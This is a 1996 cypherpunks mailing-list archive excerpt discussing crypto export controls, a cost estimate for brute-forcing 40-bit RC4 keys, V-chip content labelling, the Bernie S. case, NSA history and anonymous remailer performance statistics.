>Is this maybe what you're thinking of?

Yes, I guess that was it. Thanks for the correction. Anyway, moving to the
actual point, it does seem most major software players are agreeing to the
USG demands.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: norm@netcom.com (Norman Hardy)
Date: Fri, 26 Jan 1996 03:14:47 +0800
To: cypherpunks@toad.com
Subject: The cost of breaking RC4 with a 40 bit key.
Message-ID: <ad2d658900021004e878@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


I think that special hardware to break RC4 would require 256 bytes of
registers and only a few hundred control gates. Lets say 5000 transistors
per "module". You can put several hundred modules on a chip. Each module
can easily do one step in 5 ns. I havn't figured out what the attack would
be (known plain text etc.) and hardware to handle that might be more. In
mass production the marginal cost of such a chip might be $100.  Perhaps
trying one key requires 100 steps. I get the cost per key trial as follows:

(100  $/chip)(100 steps/trial)(5 (module*ns)/step)/
((10^9 ns/sec)(10^8 sec/(economic lifetime))(200 modules / chip))

10^(2+2+.7 - (9+8+2.3)) $/keytrial= 10^(-15+.4) $/keytrial
 = 2.5*10^(-15) $/keytrial

I compute the cost of breaking a 40 bit key as 2.5*10^(-3) $ or one quarter
of a cent.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tnaggs@cddotdot.mikom.csir.co.za (Anthony Naggs)
Date: Thu, 25 Jan 1996 17:29:32 +0800
To: declan+@CMU.EDU (Declan B. McCullagh)
Subject: Re: UK newspaper names Zimmermann a "neo-Nazi sympathiser"
In-Reply-To: <kl1ibG200YUv8z81Mk@andrew.cmu.edu>
Message-ID: <m0tfMNS-000VVkC@cddotdot.mikom.csir.co.za>
MIME-Version: 1.0
Content-Type: text/plain


Declan McCullagh kindly forwarded Mike Godwin's comments thusly:
> 
> From: Mike Godwin <mnemonic@well.com>
> Subject: Re: UK newspaper names Zimmermann a "neo-Nazi sympathiser"
> To: Declan McCullagh
> Date: Wed, 24 Jan 1996 18:13:11 -0800 (PST)
> Cc: fight-censorship+@andrew.cmu.edu
> 
>  
> Zimmermann stands to recover a lot if he sues the Telegraph under British
> libel laws.
> 
> 
> --Mike
> 
> [...]

Er no, in practice it is hard to persue a libel case in the UK where the
publication has responded immediately with a printed apology - especially
if the apology is prominently placed.  The mail catenated to Godwin's
comments (from PRZ himself) indicates that the Sunday Telegraph will be
publishing such an apology in their next edition.  An out of court 
settlement, apart from lawyers costs, may yield a charitable donation but
it certainly looks like PRZ will benefit from a sympathetic article 
which seems to me to be a pretty good result!


Cheers,
--
Anthony Naggs	- Computer Security & Anti-Virus Engineer, CSIR, South Africa
Disclaimer: these are my personal views and opinions, and do not represent
	my employers; past, present or future.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Fri, 26 Jan 1996 03:49:03 +0800
To: cypherpunks@toad.com
Subject: Re: V-chip?
In-Reply-To: <65534.297195739@va.arca.com>
Message-ID: <199601251753.JAA18561@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


williams@va.arca.com (Jeff Williams) writes:

 > But what if they *ask* you nicely to label your work?

 >   "If you think your message is offensive, violent, or racist,
 >    would you please consider labelling it?"

 > I don't think I'd mind.  In fact, *optional* labels would
 > make me more likely to post such material, because I'd have
 > some confidence that it would only be read by people who
 > want to read it. (And they could even find it more quickly!)

For Usenet, a similar function is provided automatically by
search engines.  This is why I almost always read news now using
Alta Vista.  The database is updated with new articles in real
time, and I can use any label I choose (i.e. search criteria) to
find material in my chosen subject areas across all newsgroups.

In some sense, search engines are automatic labeling devices for
Usenet traffic.  I find them useful.  With a few more orders of
magnitude computing power, such technology could easily be
applied to audiovisual material as well.

 > There's nothing inherently wrong with labelling
 > information. When messages here are labelled [NOISE], I
 > know to avoid them. This sort of meta-information is helpful
 > and good.

Yes.  Voluntary labeling of publicly available information, or
services which permit selection of such information based on
personal criteria, is a Good Thing(tm).

Government labeling of publicly available information and laws
which mandate the use of such labels at the distribution end are
a Bad Thing(tm).

 > The precedent is what's troubling. Someone will probably
 > try to mandate the labels...Someone will try to write a law
 > that says "Anyone who posts what I consider offensive
 > without a label is guilty." This is what should be
 > fought...not labels.

A nice example of this in the private sector is TV Guide's
labeling of cable movies by content.  This goes beyond the MPAA
rating and includes such terms as "strong language", "nudity",
"violence", "adult themes", and "sexual situations." Were TV
Guide available in computer readable form, one could easily grep
the guide based on such keyphrases and plot summaries to find
everything from "DuckTales" to "Marilyn Chambers' Bikini Bistro."
Certainly easier than reading more than a dozen pages of tiny
print.

Again, I find this sort of thing useful, although I would be
among the first to protest if the government mandated it in law,
or required extra circuitry in all television sets to take
advantage of it.

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dan@milliways.org (Dan Bailey)
Date: Thu, 25 Jan 1996 23:53:59 +0800
To: cypherpunks@toad.com
Subject: Bernie S. Sentencing
Message-ID: <199601251509.KAA21760@remus.ultranet.com>
MIME-Version: 1.0
Content-Type: text/plain


I believe that Ed was the first person to be sentenced under PA's new
anti-toll fraud law which makes it illegal to build, distribute, or
distribute plans for, or use "toll-fraud" devices which include EEPROM
burners, cellular diagnostic equipment, etc.  The Man couldn't put him
away for any length of time for that, so they're trying another angle.

ObCrypto: When they pass laws against "info-laundering"/"electronic
identity hiding" tools, it'll probably go something like this.
=========BEGIN FORWARDED MESSAGE=========
Date: Mon, 22 Jan 1996 06:48:44 -0500 (EST)
From: Emmanuel Goldstein <emmanuel@2600.COM>
Subject: Bernie S. Sentencing Friday

I just found out that Bernie S. will be sentenced this Friday morning
at 9 am in Easton, PA for the crime of removing batteries from a tone
dialer several years ago. This is defined as a victimless misdemeanor
for which the judge in this small town (under considerable influence
from the Secret Service) set bail at $250,000. He could get two years
in prison at sentencing. Press attention could be very helpful in
avoiding a sentence as irrational as the bail setting - right now the
only influence these people are getting is from the Secret Service and
they want to put Bernie S away for as long as they can. If you're not
entirely up to date on this story, finger bernies@2600.com for all of
the details.

If you know of anyone who will cover this story, please get ahold of
them right away so they can plan on being there. If anyone is
interested
in going, let me know so we can hopefully fill some cars from NYC.

Sentencing is scheduled for Friday, January 26 at 9 am
Courtroom 5
Northampton County Government Center
7th and Washington Street
Easton, PA 18042-7492

(610) 559-3020 (district attorney)

case # 2173-1993
The Commonwealth of Pennsylvania vs. Edward E. Cummings
Misdemeanor 2 - tampering with physical evidence

Please help spread the word.

emmanuel@2600.com



=========END FORWARDED MESSAGE=========






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: geeman@best.com
Date: Fri, 26 Jan 1996 02:52:20 +0800
To: cypherpunks@toad.com
Subject: RE: Microsoft's CryptoAPI - thoughts?
Message-ID: <Chameleon.960125102940.geeman@geeman.vip.best.com.best.com>
MIME-Version: 1.0
Content-Type: text/plain



>What does everyone think about this? Perhaps I already missed the boat, but
>I just found out about it. How would international apps work? Would a data
>file encrypted with an app compiled with a US-only CSP (cryptographic
>service provider) be able to be loaded by a European equivalent app?
>
>[Info can be found at: http://www.microsoft.com/intdev/inttech/cryptapi.htm]
>
>
>--
>rickt@psa.pencom.com
>egalitarian, philosopher, unix cowboy, '68 chevy pickup hacker
>
>
To which I would like to generalize: what do you (all those with an opinion on the matter) think/feel/intuit 
about general crypto API's overall?  How would you compare some of the simultaneous threads of 
development going on now in different orgs?  Any strong positions out there? 







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@dev.tivoli.com (Mike McNally)
Date: Fri, 26 Jan 1996 02:48:01 +0800
To: williams@va.arca.com
Subject: Re: V-chip?
In-Reply-To: <65534.297195739@va.arca.com>
Message-ID: <9601251636.AA09314@alpha>
MIME-Version: 1.0
Content-Type: text/plain



Jeff Williams writes:
 > But what if they *ask* you nicely to label your work?
 > 
 >   "If you think your message is offensive, violent, or racist,
 >    would you please consider labelling it?"
 > 
 > I don't think I'd mind.  

Yea!  And I'm sure you won't mind assuming the liability when somebody
disagrees with your label and files a civil suit against you.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| Nobody's going to listen to you if you just | Mike McNally (m5@tivoli.com) |
| stand there and flap your arms like a fish. | Tivoli Systems, Austin TX    |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Thu, 25 Jan 1996 18:24:50 +0800
To: Cypherpunks@toad.com
Subject: Pssst......Wanna buy a mailing list?
Message-ID: <199601250940.KAA05908@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

A wonderful little annoucement for a new WWW site appeared in my anon
mail this evening, It was for a site offering Privacy Tools and Offshore 
Activities, Poor guy who sent the message,  sent it without BCCing it
and hence, Everyone who requested his autoresponder file on Anonymous
Banking is listed. (At least 100+ addresses!)  

Highlighs of the domains in the mailing:

nea.org       Gotta keep some money stashed for education!
uspto.gov     Nym's requesting infomation for hiding patent $$$
mot.com       Good year for Motorola stocks!
fmr.com       Fidelity Investments....Hmmmmm

I'll bet my last E-Ca$h coin that there will be alot of these people learning
about anonymous remailers the hard way.

Malthus


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMQclaQJo+wOswDgJAQGUJgP+Jf2XnmRf9EHtVUI18cd1ipAme9KyyOfO
MBrsDsRKBCFdT7HbTshqjULXQTd5kvI62PmnDEbVQ52L30tSs/Dp9tTbg8HYVIbS
Vpcs/RvB0KeiMy+x6RniVljvGPRgRzefidTqtiKADQc76xl/gNW1JK6rySFQLMRO
kHRP4btnqkM=
=GL1y
-----END PGP SIGNATURE-----

L. Malthus  <an266153@anon.penet.fi>
PGP key listed at MIT 

--




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Fri, 26 Jan 1996 00:34:45 +0800
To: olbon@dynetics.com
Subject: Re: Crippled Notes export encryption
Message-ID: <9601251543.AA14741@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


> Seriously, this just illustrates the idiocy of banning "hooks" in software.

Yes.  That's why an API that supported generic data transforms and
that included compression and for non-export encryption would be a useful
thing.  I have a start toward such an API definition that I will email to
anyone who might wanna finish it off.  I started doing it around the time
that Raph talked about his per-user crypto server.

> How does one define a "hook"?  Just providing source code could be defined
> as providing a hook, since a good programmer could then modify it to do
> crypto.  Also, how about the various kits and tools used to integrate pgp
> with pine, eudora, etc -- are these not "hooks"?

They define a hook.  They define it on a case-by-case basis.  "They" is
the Office of Defence Trade Controls, in conjunction with their consulting
experts primarily people in the department of Export Control at the NSA.
Luckily the ITAR talks about willful violations.
	/r$





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Fri, 26 Jan 1996 01:05:47 +0800
To: dan@milliways.org
Subject: Re: Bernie S. Sentencing
In-Reply-To: <199601251509.KAA21760@remus.ultranet.com>
Message-ID: <199601251550.KAA08091@homeport.org>
MIME-Version: 1.0
Content-Type: text



	Before anyone complains of a lack of crypto relevance to this,
Bernie S is the guy who brought Clipper phones & actual clipper chips
which he convinced Mykrotronix to send him to the HOPE conference in
NYC two years ago.

	These clipper phones added a new argument to the long list
against clipper, and that was the phones barely worked, despite
Bernie's efforts.

	He also gave away one of the two clippers that he brought,
which was destroyed with a small explosive device, showing the truth
of the old saw about there being few problems not solvable with a
suitable application of high explosives. :)

	If any of our writers could be at his sentencing, a little
press attention for the guy would be real helpful.

Adam

Dan Bailey wrote:

| I believe that Ed was the first person to be sentenced under PA's new
| anti-toll fraud law which makes it illegal to build, distribute, or
| distribute plans for, or use "toll-fraud" devices which include EEPROM
| burners, cellular diagnostic equipment, etc.  The Man couldn't put him
| away for any length of time for that, so they're trying another angle.
| 
| ObCrypto: When they pass laws against "info-laundering"/"electronic
| identity hiding" tools, it'll probably go something like this.
| =========BEGIN FORWARDED MESSAGE=========
| Date: Mon, 22 Jan 1996 06:48:44 -0500 (EST)
| From: Emmanuel Goldstein <emmanuel@2600.COM>
| Subject: Bernie S. Sentencing Friday
| 
| I just found out that Bernie S. will be sentenced this Friday morning
| at 9 am in Easton, PA for the crime of removing batteries from a tone
| dialer several years ago. This is defined as a victimless misdemeanor
| for which the judge in this small town (under considerable influence
| from the Secret Service) set bail at $250,000. He could get two years
| in prison at sentencing. Press attention could be very helpful in
| avoiding a sentence as irrational as the bail setting - right now the
| only influence these people are getting is from the Secret Service and
| they want to put Bernie S away for as long as they can. If you're not
| entirely up to date on this story, finger bernies@2600.com for all of
| the details.
| 
| If you know of anyone who will cover this story, please get ahold of
| them right away so they can plan on being there. If anyone is
| interested
| in going, let me know so we can hopefully fill some cars from NYC.
| 
| Sentencing is scheduled for Friday, January 26 at 9 am
| Courtroom 5
| Northampton County Government Center
| 7th and Washington Street
| Easton, PA 18042-7492
| 
| (610) 559-3020 (district attorney)
| 
| case # 2173-1993
| The Commonwealth of Pennsylvania vs. Edward E. Cummings
| Misdemeanor 2 - tampering with physical evidence
| 
| Please help spread the word.
| 
| emmanuel@2600.com
| 
| 
| 
| =========END FORWARDED MESSAGE=========
| 
| 


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Barber <jeffb@sware.com>
Date: Fri, 26 Jan 1996 00:24:46 +0800
To: tighe@spectrum.titan.com
Subject: Re: Crippled Notes export encryption
In-Reply-To: <199601251504.JAA04039@softserv.tcst.com>
Message-ID: <199601251555.KAA01850@jafar.sware.com>
MIME-Version: 1.0
Content-Type: text/plain


Mike Tighe writes:
> Jeff Weinstein writes:

> >> Didn't Netscape already promise to remove the hooks? It seems to me all of
> >> the major software players are already in bed with the government.
> >
> >  What do you mean by "promise to remove the hooks"?
> 
> I mean they planned to have some type of crypto, but then after a visit
> from the USG, they removed that plan, and even withdrew the interface so
> that someone else couldn't "drop in" the crypto. The press release
> describing it was within the past 12 months or so. I will find it
> eventually.

I think you may be confused.  I do recall a report that some NSA folks
visited NCSA and recommended they remove crypto hooks from the NCSA httpd.
Is this maybe what you're thinking of?


-- Jeff




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike Gurski <mgursk1@gl.umbc.edu>
Date: Fri, 26 Jan 1996 02:11:03 +0800
To: cypherpunks@toad.com
Subject: Re: Crippled Notes export encryption
In-Reply-To: <199601250034.TAA09745@toxicwaste.media.mit.edu>
Message-ID: <Pine.SGI.3.91.960125105552.5489A-100000@umbc10.umbc.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 24 Jan 1996, Derek Atkins wrote:

> > How exactly are crypto-hooks defined?  This restriction seems orders
> > of magnitude more bogus than even the ban on exporting actual
> > encryption.
> 
> Very vaguely.  If I have a function that does something like this:
> 
> authenticate (args)
> {
> 	...
> 
> 	des_encrypt ();
> 	...
> }
> 
> I would have to remove the des_encrypt() call from the authenticate()
> routine before it can be exported...

Would removing the call to des_encrypt() and replacing it with a
comment violate the restriction?  something like:

authenticate (args)
{
	...
	/* squeamish ossifrage */
	...
}


--
|\/|ike Gurski  mgursk1@gl.umbc.edu  FidoNet: 1:261/1062
http://www.gl.umbc.edu/~mgursk1/   finger -l for PGP public key   |Member,
1024/39B5BADD PGP Keyprint=3493 A994 B159 48B7 1757 1E4E 6256 4570|   Team
My opinions are mine alone, even if you should be sharing them.   |   OS/2





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 26 Jan 1996 01:39:10 +0800
To: cypherpunks@toad.com
Subject: TOP_tap
Message-ID: <199601251559.KAA02710@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   1-25-96. TWPsst:

   "Military Men Named to Top Intelligence Posts."

      AF Gen. Kenneth Minihan to run all US eavesdropping on
      foreign governments and citizens at NSA, which is
      responsible for providing US officials with a steady
      stream of intercepted electronic data on foreign weapons
      and conversations involving foreign politicians. The
      NSA's eavesdropping costs an estimated $3.5 billion a
      year, a large portion of which supports its computer
      operations at Fort Meade and its world-class experts in
      mathematics.

   TOP_tap










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 26 Jan 1996 04:16:43 +0800
To: cypherpunks@toad.com
Subject: "This post is G-Rated"
Message-ID: <ad2cff3b0a02100475c5@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


[This post is classified as G-Rated by Tim May. G-Rated for children of all
ages, children who need to learn about the facts of life as quickly as
possible. G-Rated for "This post really tickles your G-spot!" You asked for
voluntary self-ratings, you got it.)


At 2:16 PM 1/25/96, Jeff Williams wrote:

>But what if they *ask* you nicely to label your work?
>
>  "If you think your message is offensive, violent, or racist,
>   would you please consider labelling it?"
>
>I don't think I'd mind.  In fact, *optional* labels would make me more likely
>to post such material, because I'd have some confidence that it would only be
>read by people who want to read it. (And they could even find it more
>quickly!)

If the League of Usenet Ladies makes this request, I have no problems
(though I'm almost certain to delete their request and do nothing one way
or another about it). If the Islamic Students Association makes the same
request, I also have no problems (and will also likely discard the
request). These are non-governmental entities, merely requesting actions
(and, of course, gettting about 2% compliance, or less,  with their
requests).

(Note of course that the League of Usenet Ladies and the Islamic Students
Association are very likely to have very different ideas about what the
labels should reflect! Not to mention the several hundred other major
special interest groups who will want their ideologies reflected in a
ratings system.)

However, it is not a role for _government_ to ask that I "voluntarily" rate
speech. "Congress shall make no law..." A government that faces a 2%
compliance rate will be sorely tempted to make it less than voluntary.

And what standards? What happens if I indeed voluntarily rate my message
"G-rated"? And it contains descriptions highly unsuitable for children (in
the minds of others). What if I use _my_ conceptions of what is right for
children to read or see to actually _attract_ them to my writings?

A ratings system inevitably means a debate about what the ratings mean, and
whether some work is properly rated. Self-rating runs into this problem big
time. Especially when people like me like to throw grenades into
discussions to challenge the orthodoxy.

(Note that the MPAA movie rating system is _not_ run by the government, nor
is it even "suggested" by government...though I don't deny that the movie
theater owners adopted the MPAA ratings to forestall  talked-of government
actions. But of course movies pass through the chokepoint of distribution,
and time usually exists to rate them. Usenet posts would of course not fit
this model.)

>There's nothing inherently wrong with labelling information. When messages
>here are labelled [NOISE], I know to avoid them. This sort of
>meta-information is helpful and good.
>
>The precedent is what's troubling. Someone will probably try to mandate the
>labels...Someone will try to write a law that says "Anyone who posts what I
>consider offensive without a label is guilty." This is what should be
>fought...not labels.

So deal with the hypothetical I gave: someone like me sets out to "nuke"
the labelling system by deliberately mislabelling his posts! If you have
labels but no means of stopping my actions, see what results.

In any case, if people want to label their posts, fine. Personally, I find
such simple labels as "NOISE" or "OBSCENITY" to be meaningless. Many of the
most interesting posts have that stupid "NOISE" label attached, many of the
most noisome posts don't.

I see no agreed-upon labelling convention emerging. Fortunately.

--Tim May

Boycott espionage-enabled software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Fri, 26 Jan 1996 02:14:07 +0800
To: dan@milliways.org (Dan Bailey)
Subject: Re: Bernie S. Sentencing
In-Reply-To: <199601251509.KAA21760@remus.ultranet.com>
Message-ID: <199601251650.LAA16112@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Dan Bailey writes:
> I believe that Ed was the first person to be sentenced under PA's new
> anti-toll fraud law which makes it illegal to build, distribute, or
> distribute plans for, or use "toll-fraud" devices which include EEPROM
> burners, cellular diagnostic equipment, etc.  The Man couldn't put him
> away for any length of time for that, so they're trying another angle.

Quite seriously, this is not "Evil Hacker D00DZ" punks. Can we cut the
posts on that topic?

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Fri, 26 Jan 1996 02:31:26 +0800
To: Adam Shostack <adam@lighthouse.homeport.org>
Subject: Re: Bernie S. Sentencing
In-Reply-To: <199601251550.KAA08091@homeport.org>
Message-ID: <199601251653.LAA16128@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Adam Shostack writes:
> 	Before anyone complains of a lack of crypto relevance to this,
> Bernie S is the guy who brought Clipper phones & actual clipper chips
> which he convinced Mykrotronix to send him to the HOPE conference in
> NYC two years ago.

Okay, but no one said that in the original message, and it still isn't
clear how relevant this is. If someone like Tim or me were put in jail
for, say, drunk driving, I'm not sure it would be proper news here.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 26 Jan 1996 04:26:11 +0800
To: cypherpunks@toad.com
Subject: PGP in Eudora and other mail programs
Message-ID: <ad2d0b540b0210044d67@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:13 PM 1/25/96, Clay Olbon II wrote:

>Seriously, this just illustrates the idiocy of banning "hooks" in software.
>How does one define a "hook"?  Just providing source code could be defined
>as providing a hook, since a good programmer could then modify it to do
>crypto.  Also, how about the various kits and tools used to integrate pgp
>with pine, eudora, etc -- are these not "hooks"?

And yet how many of these programs actually can transparently
(automatically, push-button, etc.) support PGP? I've been a user of Eudora
for several years, and have pressed for PGP hooks. The company, Qualcomm,
once told me it was on their list of things to do, but....

A few years later, still no PGP-in-Eudora. One would think that this would
be a powerful way of distinguishing their product from other mail packages.

(I understand from this list that Eudora for Windows is now doing this much
more automatically, that someone has a PGP-in-Eudora package. I don't think
it was from Qualcomm, but I could be wrong. As a Macintosh version user,
I'm hoping this comes to the Mac version as well.)

Food for thought.

--Tim May

Boycott espionage-enabled software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Strasheim <cp@proust.suba.com>
Date: Fri, 26 Jan 1996 03:54:42 +0800
To: ses@tipper.oit.unc.edu (Simon Spero)
Subject: Re: mouse droppings
In-Reply-To: <Pine.SOL.3.91.960125081926.1217A-100000@chivalry>
Message-ID: <199601251757.LAA01686@proust.suba.com>
MIME-Version: 1.0
Content-Type: text


> Larry Irving is a deputy secretary at the Commerce Department, and heads 
> up the NTIA and NII initiatives. He has a strong  civil rights 
> background, and actually uses the net rather than just having some aide 
> send him some clippings. 

Is Mr. Irving one of the people responsible for the recent positive 
statements coming out of Commerce?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: koontz@MasPar.COM (David G. Koontz)
Date: Fri, 26 Jan 1996 05:47:22 +0800
To: perry@piermont.com
Subject: Re: NSA advanced knowledge
Message-ID: <9601252014.AA03836@argosy.MasPar.COM>
MIME-Version: 1.0
Content-Type: text/plain


In 1987 there were a series of papers given out as part of the package to
CCEP vendors (or prospective vendors):
 
The Secure Data Network System: An Overview             (NSA)
        By: Gary L. Tater
            Edmund G. Kerut
 
SDNS Products in the Type II Environment        (contains refer to 1987 paper)
        John Linn 
        BBN Communications Corporation  (need for easy Key Management)
          Cambridge, Massachusetts
 
SDNS Services and Architecture
        Ruth Nelson
        Electronic Defense Communications Directorate
        GTE Government Systems Corporation
        77 A Street
        Needham, MA 02194
 
        ....
                Key Management
                --------------
 
            The heart of SDNS is the Firefly keying 
            system,  which is based on public key en-
            cryption.  Each terminal has a unique Fire-
            fly key which is bound together with a
            non-forgeable certificate.  The certificate
            identifies the terminal and specifies its
            security-relevent characteristics.  Two
            SDNS terminals desiring to communicate ex-
            change certificates and keying information
            (the Firefly excange) and make access con-
            trol decisions based on the identifying in-
            formation.  The exchange generates a traf- 
            fic key which is unique to the two 
            terminals and which is new for that key ex-
            change.  If communication is permissible,
            the terminals then negotiate the communca-    
            tions parameters for use of the traffic
            key.
       ...    
 
SP4:  A Transport Encapsulation Security Protocol
        Dennis Branstad, National Bureau of Standards
        Joy Dorman, Digital Equipment Corporation
        Russell Housley, Xerox Corporation
        James Randall, International Business Machines Corporation
 
Access Control Within SDNS
        by Edward R. Sheehan
           Analytics Incorporated
           9821 Broken Land Parkway
           Columbia, Maryland 21046
 
None of these contained any dates except the 1987 paper  reference      
------------------------------------------------------------------
 
This is the earliest reference I know of to government public key cryptography,
and I was under the impression this was where the reference in Gus Simmons
book came from.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 26 Jan 1996 05:52:46 +0800
To: cypherpunks@toad.com
Subject: Secrecy of NSA Affiliation
Message-ID: <ad2d127a0c021004fb6e@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:55 PM 1/25/96, Rich Salz wrote:

>Up until recently (18-30 months ago) NSA employees were only allowed
>to identify themselves as employees of DoD.  It was common knowledge,
>that unspecific references to Fort Meade meant NSA; and if you saw
>a P.O. from Procurement Office, Fort Meade, it meant the NSA was buying
>it.

When I attended Crypto '88, nearly 8 years ago, at least several of the NSA
attendees had "National Security Agency" on their name badges. It may be
that run-of-the-mill employees still maintain the fiction  for public
consumption that they are DOD employees, but such was not the case in 1988
at "Crypto."

(Recall the "NSA Employees Manual" which 2600 liberated, and which Grady
Ward then redistributed. It had some tips, as I recall, on what employees
should tell the curious.)

When I visited the D.C. area in early '91 or '92 (I forget which year it
was), I stopped by Fort Meade to see the place. The sign out front
prominently said "National Security Agency," complete with the NSA seal (an
eagle lifting a hacker up in its talons).

Also, much other evidence points to the NSA having "gone public" much
farther back in time than 18-30 months ago. Former DIRNSAs on the
MacNeil-Lehrer Newshour were always introduced as former directors of the
NSA. As early as the mid-80s, as I recollect. I think Bamford's book pretty
much outed the name, though it was widely known before that, of course.

(I attended my freshman year of high school in Langley, VA. Through the
woods on one side of the school was CIA headquarters. At that time, 1967,
it was still only labelled as something like "Department of Transportation
Road Testing Facility." Everyone knew what it really was, of course. Rick
Smith, on this list, was a classmate of mine and can attest to this. The
CIA "went public" in the early 70s, the NSA in the early 80s, the NRO in
the early 90s...I sense a pattern. This means the ultra-secret ERO
(Extraterrestrial Research Organization) will be outed in the opening years
of the next decade.)

--Tim May


Boycott espionage-enabled software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Baugh <bruceab@teleport.com>
Date: Fri, 26 Jan 1996 07:31:43 +0800
To: cypherpunks@toad.com
Subject: Remailer stats
Message-ID: <2.2.32.19960125205454.00681468@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


The following is the result of my own experiments, performed when a) I
started noticing that my remailing times didn't seem to match the ping lists
available and b) another local guy posted a format that seemed useful, so I
swiped it.

I mailed through each of the remailers listed below ten times over the
course of eight days (10 Jan 96 to 18 Jan 96) - posts went out spread across
all hours of the day and night, to compensate for congestion at high-traffic
times. (Insomnia's value as a research aid, coming soon to a major
scientific journal.) Each post went through the remailer, to a nym server,
back through the remailer, and then to me. The trip time is the interval
from the end of a posting session with Eudora and PPP connection to Teleport
to the arrival of a message in my mailbox at Teleport. Times are given in
hours and minutes. "Failure" means that I hadn't gotten a reply back within
four days of posting it.

I anticipate doing this on a monthly basis, and would be delighted to hear
from anyone else doing the same. Joel McNamara has raised the possibility of
a net resource that would feed back the data for whatever region is closet
to the inquirer, which sounds seriously cool to me.

REMAILER PERFORMANCE, MID-JANUARY

FAILURES    REMAILER                        AVG     MIN     MAX     NOTES

 0          hroller@c2.org                  00:05   00:02   00:18
 0          homer@rahul.net                 00:06   00:03   00:14
 0          hfinny@shell.portal.com         00:08   00:02   00:38
 0          remailer@armadillo.com          00:09   00:06   00:12
 0          hal@alumni.caltech.edu          00:09   00:02   00:24
 0          remailer@utopia.hacktic.nl      00:19   00:03   01:20
 0          mixmaster@vishnu.alias.net      00:56   00:23   02:38
 0          remailer@valhalla.phoenix.net   01:35   00:20   05:49
 0          mixmaster@remail.obscura.com    02:36   00:23   06:55
 0          remailer@bi-node.zerberus.de    07:43   00:15   19:54

 1          remailer@replay.com             00:31   00:13   01:14

 2          remail@c2.org                   00:52   00:14   03:00

 8          remailer@extropia.wimsey.com    01:46   01:19   02:13   [1]
 8          mix@remail.gondolin.org         11:17   03:58   18:36

10          amnesia@chardos.connix.com      ?       ?       ?

[1] On the 19th or 20th, extropia.wimsey.com suddenly cleared backlog, and
all my messages did go through. So I'll see how it does in February; looks
like they had a week-long weirdness of some kind.

Comments welcome.

Bruce Baugh
bruceab@teleport.com
http://www.teleport.com/~bruceab





